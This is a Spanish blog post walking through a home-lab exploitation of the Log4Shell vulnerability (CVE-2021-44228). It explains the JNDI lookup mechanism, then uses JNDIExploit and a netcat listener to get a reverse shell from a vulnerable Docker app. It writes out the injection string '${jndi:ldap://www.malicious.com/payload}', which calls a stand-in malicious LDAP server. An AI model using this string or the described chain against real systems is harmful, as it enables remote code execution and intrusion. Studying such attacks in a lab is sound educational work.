<!DOCTYPE html><html lang="es"> <head><meta charset="UTF-8"><meta name="description" content="Dashboard de recursos y blog de Raúl Riesco"><meta name="viewport" content="width=device-width"><link rel="icon" type="image/svg+xml" href="/favicon.ico"><meta name="generator" content="Astro v4.16.19"><title>Explotar vulnerabilidad de Log4j (CVE-2021-44228) | Blog</title><link rel="preconnect" href="https://fonts.googleapis.com"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link href="https://fonts.googleapis.com/css2?family=Outfit:wght@300;400;600;700&display=swap" rel="stylesheet"><meta name="astro-view-transitions-enabled" content="true"><meta name="astro-view-transitions-fallback" content="animate"><style>.post-content{max-width:800px;margin:4rem auto;background:#1e293b4d;backdrop-filter:blur(12px);border:1px solid rgba(255,255,255,.1);border-radius:1.5rem;padding:3rem}.post-header{margin-bottom:3rem;border-bottom:1px solid rgba(255,255,255,.1);padding-bottom:2rem}.back-link{color:var(--accent-light);text-decoration:none;font-weight:500;display:inline-block;margin-bottom:1.5rem}.post-meta{color:var(--text-muted);font-size:.9rem;margin-bottom:1rem;text-transform:uppercase;letter-spacing:.05em}.post-header h1{font-size:3rem;margin:0;line-height:1.1}.hero-image{width:100%;border-radius:1rem;margin-top:2rem}.markdown-body{line-height:1.8;font-size:1.1rem;color:#e2e8f0}.markdown-body h2{font-size:2rem;margin-top:3rem;margin-bottom:1.5rem;color:#fff}.markdown-body h3{font-size:1.5rem;margin-top:2.5rem;margin-bottom:1rem;color:#fff}.markdown-body p{margin-bottom:1.5rem}.markdown-body ul,.markdown-body ol{margin-bottom:1.5rem;padding-left:1.5rem}.markdown-body li{margin-bottom:.5rem}.markdown-body code{background:#0f172acc;padding:.2rem .4rem;border-radius:.3rem;font-family:Fira Code,monospace;font-size:.9em}.markdown-body pre{background:#0f172a!important;padding:1.5rem;border-radius:1rem;overflow-x:auto;margin:2rem 0;border:1px solid rgba(255,255,255,.1)}.markdown-body img{max-width:100%;border-radius:.75rem;margin:2rem 0;border:1px solid rgba(255,255,255,.1)}.post-footer{margin-top:4rem;padding-top:2rem;border-top:1px solid rgba(255,255,255,.1)}@media (max-width: 768px){.post-content{padding:1.5rem;margin:1rem}.post-header h1{font-size:2rem}}
.astro-route-announcer{position:absolute;left:0;top:0;clip:rect(0 0 0 0);clip-path:inset(50%);overflow:hidden;white-space:nowrap;width:1px;height:1px}:root{--accent: 136, 58, 234;--accent-light: 224, 204, 250;--accent-dark: 49, 10, 101;--accent-gradient: linear-gradient( 45deg, rgb(var(--accent)), rgb(var(--accent-light)) 30%, white 60% );--bg-color: #020617;--card-bg: rgba(30, 41, 59, .5);--text-color: #f8fafc;--text-muted: #94a3b8}html{font-family:Outfit,sans-serif;background:var(--bg-color);color:var(--text-color);scroll-behavior:smooth}body{margin:0;padding:0;min-height:100vh;display:flex;flex-direction:column;align-items:center;overflow-x:hidden}.background-radial{position:fixed;top:0;left:0;width:100%;height:100%;z-index:-1;background:radial-gradient(circle at 50% 0%,#1e3a8a4d,#020617 70%)}main{width:100%;max-width:1200px;padding:2rem;box-sizing:border-box}h1,h2,h3{font-weight:700;letter-spacing:-.025em}a{color:inherit;text-decoration:none}*{box-sizing:border-box}
</style><script type="module" src="/_astro/hoisted.BScVxmeO.js"></script></head> <body> <div class="background-radial"></div> <main>  <article class="post-content"> <div class="post-header"> <a href="/blog" class="back-link">&larr; Volver al Blog</a> <div class="post-meta"> 17 de febrero de 2022 <span class="author"> • Por Raúl Riesco</span> </div> <h1>Explotar vulnerabilidad de Log4j (CVE-2021-44228)</h1>  </div> <div class="markdown-body"> <h2 id="explicación-teórica">Explicación teórica</h2>
<p>En esta ocasión vamos a realizar una práctica de laboratorio sencilla donde explotaremos la en su día ya famosa vulnerabilidad <code>Log4shell</code>. Esta vulnerabilidad es del tipo RCE (Ejecución Remota de código), con una gran criticidad y fue en su momento un 0day en el popular paquete de logging <code>log4j</code>.</p>
<p>Algunos detalles más técnicos de la vulnerabilidad pueden leerse <a href="https://www.lunasec.io/docs/blog/log4j-zero-day/">aquí</a></p>
<p>A partir de esta vulnerabilidad y su correspondiente parche, se fueron desencadenado nuevas vulnerabilidades. La <a href="https://blog.aquasec.com/log4j-vulnerabilities-overview">siguiente</a> imagen muestra la línea de acontecimientos:</p>
<p><img src="/img/log4j/key-log4j-events-timeline.jpg" alt=""></p>
<h2 id="cuál-es-el-problema-que-genera-la-vulnerabilidad">¿Cuál es el problema que genera la vulnerabilidad?</h2>
<p>El meollo de esta vulnerabilidad está contado bastante bien <a href="https://www.akamai.com/es/blog/security/a-log4j-retrospective">aquí</a> y <a href="https://infosecwriteups.com/log4j-zero-day-vulnerability-exploitation-detection-mitigation-9667908857b4">aquí</a>.</p>
<p>A muy grandes rasgos, log4j permite registrar expresiones en los logs que contengan variables, de tal forma que al loggearse la información, log4j interpreta la expresión y sustituye las variables adecuadamente:</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>"${date:MM-dd-yyyy} Access granted" </span></span>
<span class="line"><span></span></span></code></pre>
<p>Además, log4j permite anidar expresiones de búsquedas unas dentro de otras.</p>
<h3 id="jndi-java-naming-and-directory-interface">JNDI (Java Naming and Directory Interface)</h3>
<p>Esta funcionalidad de log4j permite a una aplicación obtener datos de un servidor remoto utilizando protocolos tales como LDAP o RMI.</p>
<p>Todo esta teoría junta, puede usarse para explotar la vulnerabilidad de la siguiente forma:</p>
<p><img src="/img/log4j/00.jpg" alt=""></p>
<p>Es decir, muy resumidas, ocurren las siguiente cosas:</p>
<ol>
<li>
<p>Un atacante realiza una petición a la aplicación vulnerable y “cuela” una cadena JNDI para ser loggeada por log4j (en una cabecera HTTP por ejemplo)
Esta cadena contiene una petición de búsqueda a un servidor LDAP malicioso.</p>
</li>
<li>
<p>Esta petición o cadena es, efectivamente, loggeada por log4j, que la interpreta y contacta con el servidor LDAP malicioso</p>
</li>
<li>
<p>El servidor LDAP malicioso responde con una clase Java maliciosa</p>
</li>
<li>
<p>El servidor víctima deserializa o descarga la clase Java malicoso y la ejecuta</p>
</li>
</ol>
<h2 id="caso-práctico">Caso práctico</h2>
<p>Para este escenario me he basado es una explicación genial de un buen [blog](<a href="https://ciberseguridad.blog/como-explotar-la-vulnerabilidad-log4shell-en-nuestro-laboratorio/">https://ciberseguridad.blog/como-explotar-la-vulnerabilidad-log4shell-en-nuestro-laboratorio/</a> ¡) en español y me parece importante darle su crédito.</p>
<p>Vamos a utilizar dos máquinas virtuales:</p>
<ul>
<li>
<p>En la primera ejecutaremos una aplicación vulnerable a <code>log4shell</code>. Se tratará de <a href="https://github.com/christophetd/log4shell-vulnerable-app">este</a> contenedor Docker. Utilizaré un Lubuntu que tenía a mano.</p>
</li>
<li>
<p>En la segunda ejecutaremos un <a href="https://web.archive.org/web/20211210224333/https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2">exploit</a> diseñado para esta vulnerabilidad, que levantará un servidor LDAP (para recibir la petición de la víctima) y otro HTTP (para servir el exploit).</p>
<p>También pondremos un netcat a escuchar, ya que el exploit establecerá una shell reversa.</p>
<p>Y desde este servidor será desde realizaremos la petición maliciosa a la víctima, mediante <code>curl</code>, construida adecuadamente para explotar la vulnerabilidad descrita.</p>
<p>Utilizaré una Debian que también tenía a mano.</p>
</li>
</ul>
<p>En esencia, la cosa quedaría así:</p>
<p><img src="/img/log4j/diagrama.png" alt=""></p>
<p>Así pues, vayamos al lío. Ejecutamos la aplicación vulnerablen en el Lubuntu:</p>
<p><img src="/img/log4j/1.png" alt=""></p>
<p>Ejecutamos el exploit en la Debian. Comprobamos como se inician el servidor LDAP (puerto 1389) y el HTTP (el 8888 le hemos indicado):</p>
<p><img src="/img/log4j/2.png" alt=""></p>
<p>Y ponemos en esta misma máquina netcat a la escucha para recibir la reverse shell:</p>
<p><img src="/img/log4j/3.png" alt=""></p>
<p>La petición CURL que vamos a realizar, será del tipo <code>${jndi:ldap://www.malicious.com/payload}</code>, donde <code>www.malicious.com</code> es el servidor LDAP malicioso y <code>payload</code> será la orden a ejecutar para conseguir la reverse shell, codificada en base64.</p>
<p>El <code>payload</code>:</p>
<p><img src="/img/log4j/4.png" alt=""></p>
<p>La petición CURL completa:</p>
<p><img src="/img/log4j/5.png" alt=""></p>
<p>El servidor con la aplicación vulnerable recibiendo la petición:</p>
<p><img src="/img/log4j/6.png" alt=""></p>
<p><img src="/img/log4j/7.png" alt=""></p>
<p>Nuestros servidores maliciosos en la máquina DEbian recibiendo sus respectivas peticiones LDAP y HTTP sirviendo la clase Java maliciosa:</p>
<p><img src="/img/log4j/8.png" alt=""></p>
<p>Y tras este intercambio de peticiones y respuestas, obtenemos nuestra shell inversa:</p>
<p><img src="/img/log4j/9.png" alt=""></p> </div> <div class="post-footer"> <a href="/blog" class="back-link">&larr; Volver al Blog</a> </div> </article>  </main>  </body> </html> 